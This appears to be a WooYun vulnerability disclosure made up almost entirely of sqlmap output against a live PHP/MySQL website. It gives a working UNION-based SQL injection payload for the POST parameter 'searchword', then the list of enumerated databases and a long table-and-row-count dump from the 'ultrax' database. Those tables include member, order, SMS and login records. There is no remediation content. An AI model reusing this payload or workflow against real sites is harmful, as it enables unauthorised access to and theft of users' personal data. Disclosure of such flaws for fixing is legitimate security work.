WooYun.org

web application technology: PHP 5.3.3
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: searchword
Type: UNION query
Title: MySQL UNION query (NULL) - 12 columns
Payload: =%E6%90%9C %E7%B4%A2&searchword=%E8%AF%B7%E8%BE%93%E5%85%A5%E4%BF%A1%E6%81%AF' UNION ALL SELECT CONCAT(0x7173786d71,0x54695741534d52524f6f,0x717a717371),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
web application technology: PHP 5.3.3
back-end DBMS: MySQL 5
available databases [7]:
[*] acl
[*] bbs17up
[*] information_schema
[*] test
[*] topic
[*] ultrax
[*] wiki
web application technology: PHP 5.3.3
back-end DBMS: MySQL 5.0
Database: ultrax
+--------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------+---------+
| sop_data_owner_statistics | 30077886 |
| pre_common_block_pic | 25090740 |
| cdb_visit_log | 10719559 |
| sop_data_keywords | 8023935 |
| pre_common_member_grouppm | 3018771 |
| sop_data_visit_log_zhuangxiu | 2925794 |
| sop_data_keywords_copy | 2737572 |
| sop_data_owner_log | 2722381 |
| house_smswilsend | 2321030 |
| sop_data_owner_maintenance | 2136465 |
| sop_data_error | 1213651 |
| pre_forum_post | 1173329 |
| web_tag_item | 1051338 |
| sop_data_groupon_owner | 1048650 |
| sop_data_persistence | 914206 |
| sop_data_owner_community | 751127 |
| pre_forum_statlog | 749995 |
| pre_ucenter_members | 643445 |
| pre_ucenter_memberfields | 642678 |
| sop_data_community_source | 608767 |
| sop_data_owner | 600198 |
| pre_security_evilpost | 594754 |
| pre_common_member | 584554 |
| pre_ucenter_feeds | 565288 |
| web_gallery_images | 563818 |
| sop_data_order | 499958 |
| web_gallery_images_copy | 457643 |
| sop_data_owner_copy1 | 394273 |
| pre_common_member_field_forum | 354730 |
| pre_common_member_field_home | 354676 |
| pre_common_member_status | 354673 |
| pre_common_member_count | 354672 |
| pre_common_member_profile | 351570 |
| sop_data_sms_pool | 337755 |
| sop_data_owner_copy | 331969 |
| pre_common_member_copy | 321207 |
| sop_data_groupon_demand_describe | 291077 |
| sop_data_login_log | 282058 |
| web_gallery_pic_seo | 273788 |
| sop_data_groupon_category_demand | 254576 |
| pre_forum_attachment | 225743 |
| sop_data_temp_tuiguang_bak | 217795 |
| sop_data_business_visit | 216169 |
| sop_data_attachments | 206941 |
| sop_data_temp_tuiguang | 201329 |
| sop_data_strange_phone_action_record | 173521 |
| web_uploads | 155186 |
| pre_forum_threadmod | 145343 |
| sop_data_groupon_demand | 145048 |
| sop_data_attachments_copy | 137752 |
| pre_forum_thread | 134684 |
| sop_data_owner_invite_status | 131494 |
| cdb_statistics | 126247 |
| sop_data_order_copy | 123133 |
| sop_data_sem_keywords | 119061 |
| pre_forum_typeoptionvar | 118672 |
| pre_home_notification | 118526 |
| cdb_grouporder | 112513 |
| cdb_orders | 110918 |
| web_news_footer_recommend | 109872 |
| pre_forum_threadlog | 109356 |
| sop_data_yuyue_visit | 108586 |
| pre_common_credit_rule_log | 107501 |
| pre_common_member_log | 104548 |
| sop_data_customer_assess | 103012 |
| pre_common_tagitem | 102374 |
| sop_data_order_status_log | 99871 |
| house_emailsend | 97450 |
| cdb_service_log | 95386 |
| cdb_owner | 90314 |
| pre_forum_order | 89221 |
| sop_data_community_audit | 82427 |
| sop_data_order_refund | 78882 |
| web_news | 74793 |
| pre_common_onlinetime | 72141 |
| sop_data_order_refund_operation_record | 64883 |
| sop_data_article_keywords | 63266 |
| web_news_tag | 58575 |
| sop_data_owner_voucher_new | 57106 |
| sop_data_yuyue | 56206 |
| cdb_typeoptionvars | 52401 |
| sop_data_sms_groupon | 52378 |
| web_feed | 49530 |
| web_gallery_click | 48175 |
| sop_data_order_refundreason | 46763 |
| sop_data_customer_message | 46492 |
| cdb_orderdetail | 45657 |
| pre_common_district | 45051 |
| sop_data_product_content | 43313 |
| sop_data_strange_phone | 40926 |
| pre_ucenter_authcode | 39149 |
| pre_common_word | 38721 |
| sop_data_product_module | 37319 |
| web_seo | 37159 |
| house_smswilsendback | 36300 |
| ticketpiao_log | 36075 |
| sop_data_groupon_business | 32897 |
| pre_forum_modwork | 32491 |
| supe_creditlog | 32010 |
| pre_common_member_action_log | 31248 |
| sop_data_groupon_module_product | 29556 |
| pre_ucenter_pm_members | 27171 |
| pre_forum_threadimage | 25946 |
| sop_data_blacklist | 25858 |
| sop_data_audit_log | 24319 |
| sop_data_business_history | 24185 |
| sop_syslog | 23816 |
| web_news_copy1 | 23727 |
| pre_plugin_lj_post | 22882 |
| pre_forum_attachment_6 | 22631 |
| pre_forum_attachment_2 | 22452 |
| pre_ucenter_pm_indexes | 22283 |
| pre_forum_attachment_0 | 22102 |
| pre_forum_attachment_4 | 22052 |
| pre_forum_attachment_9 | 21898 |
| cdb_sms_log | 21745 |
| pre_forum_attachment_7 | 21565 |
| pre_forum_attachment_5 | 21253 |
| pre_forum_attachment_1 | 21021 |
| sop_data_owner_notcall_maintenance | 20856 |
| sop_data_business_deposit_log | 20824 |
| pre_forum_attachment_8 | 20805 |
| pre_forum_attachment_3 | 20693 |
| supe_photoitems | 20617 |
| sop_data_price_groupon_good | 20077 |
| sop_data_sensitive | 20000 |
| sop_data_order_section | 19769 |
| cdb_login_log | 19365 |
| pre_common_tag | 18228 |
| sop_data_bargainproduct | 18090 |
| web_business_shop_picture | 18035 |
| sop_data_bargain | 17945 |
| sop_data_community | 17874 |
| pre_common_visit | 17561 |
| sop_data_sms_copy | 17515 |
| sop_data_sms_copy2 | 17496 |
| sop_data_yuyue_sendorder | 17464 |
| sop_data_business_message | 17426 |
| sop_data_groupon_discount_info | 16916 |
| web_image_tag | 16215 |
| sop_data_audit_log_history | 15133 |
| pre_mobile_wsq_threadlist | 14487 |
| sop_data_price_ingroupon | 14411 |
| web_comment_score | 14148 |
| web_gallery_relations | 14075 |
| pre_ucenter_pm_lists | 14061 |
| sop_data_owner_voucher | 13790 |
| sop_data_complain_log | 13373 |
| web_business_shop_score | 13370 |
| sop_data_groupon_good | 13046 |
| web_designer_cate_relation | 12982 |
| sop_data_gallery | 12906 |
| sop_data_gallery_copy | 11997 |
| sop_data_strange_phone_sms_pool | 11912 |
| sop_data_business_voucher_new | 11431 |
| pre_common_member_crime | 11206 |
| web_gallery_collect | 11144 |
| pre_portal_article_content | 9991 |
| sop_data_order_bank | 9937 |
| pre_portal_article_count | 9847 |
| pre_portal_article_title | 9839 |
| pre_forum_threaddisablepos | 9455 |
| pre_forum_attachment_unused | 9017 |
| pre_portal_article_content_copy | 8740 |
| pre_portal_article_title_copy1 | 8740 |